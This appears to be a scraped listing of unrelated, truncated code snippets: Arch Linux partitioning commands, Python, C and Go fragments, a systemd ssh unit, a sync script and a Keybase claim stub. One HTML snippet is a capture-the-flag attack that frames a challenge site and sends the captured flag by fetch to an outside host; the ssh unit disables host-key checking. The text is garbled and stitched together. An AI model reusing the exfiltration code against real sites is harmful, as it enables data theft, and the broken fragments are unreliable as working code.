/boot
200MB fat32 (EFI System)- mkfs.fat -F32 /dev/sdX1
/
rest xfs (Linux filesystem)- mkfs.xfs /dev/sdX2
- xfs_admin -L "arch_os" /dev/sdX2 # label partition
mkdir -p /mnt/boot
from urllib.request import urlopen | |
from urllib import request | |
import string | |
def escape(val): | |
return ''' | |
$'\\\\{}' | |
'''[1:-1].format(val) |
<!doctype html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
</head> | |
<body> | |
<iframe name=f width=100 height=100></iframe> | |
<script> |
<iframe id="ifr0" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe> | |
<iframe id="ifr1" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe> | |
<script> | |
window.addEventListener('hashchange', (evt) => { | |
const flag = evt.newURL.match(/CTF-BR\{.*\}/)[0] | |
fetch(`//tool.tonkatsu.info/?flag=${encodeURIComponent(flag)}`) | |
}) | |
</script> |
import pickle | |
import io | |
whitelist = ['sys'] | |
# See https://docs.python.org/3.7/library/pickle.html#restricting-globals | |
class RestrictedUnpickler(pickle.Unpickler): | |
def find_class(self, module, name): | |
print(module) |
123; | |
return 123; | |
} | |
extern void *opendir(const char *); | |
extern void *readdir(void *); | |
extern void *shmat(int, const void *, int); | |
typedef struct { | |
ino_t d_ino; | |
off_t d_off; | |
unsigned short d_reclen; |
package main | |
import ( | |
"bytes" | |
"crypto/rand" | |
"crypto/sha256" | |
"encoding/gob" | |
"fmt" | |
"io/ioutil" | |
"log" |
[Unit] | |
Description = SSH daemon for rescure | |
After = network.target | |
[Service] | |
ExecStart = /usr/bin/ssh \ | |
-N \ | |
-o "ExitOnForwardFailure=yes" \ | |
-o "StrictHostKeyChecking=no" \ | |
-o "UserKnownHostsFile=/dev/null" \ |
#!/bin/sh | |
remote_dir=host:path/to/remote/dir | |
local_dir=path/to/local/dir | |
usage () { | |
echo "usage: $0 [pull|push|sync]" >&2 | |
} | |
check () { |
I hereby claim:
To claim this, I am signing this object: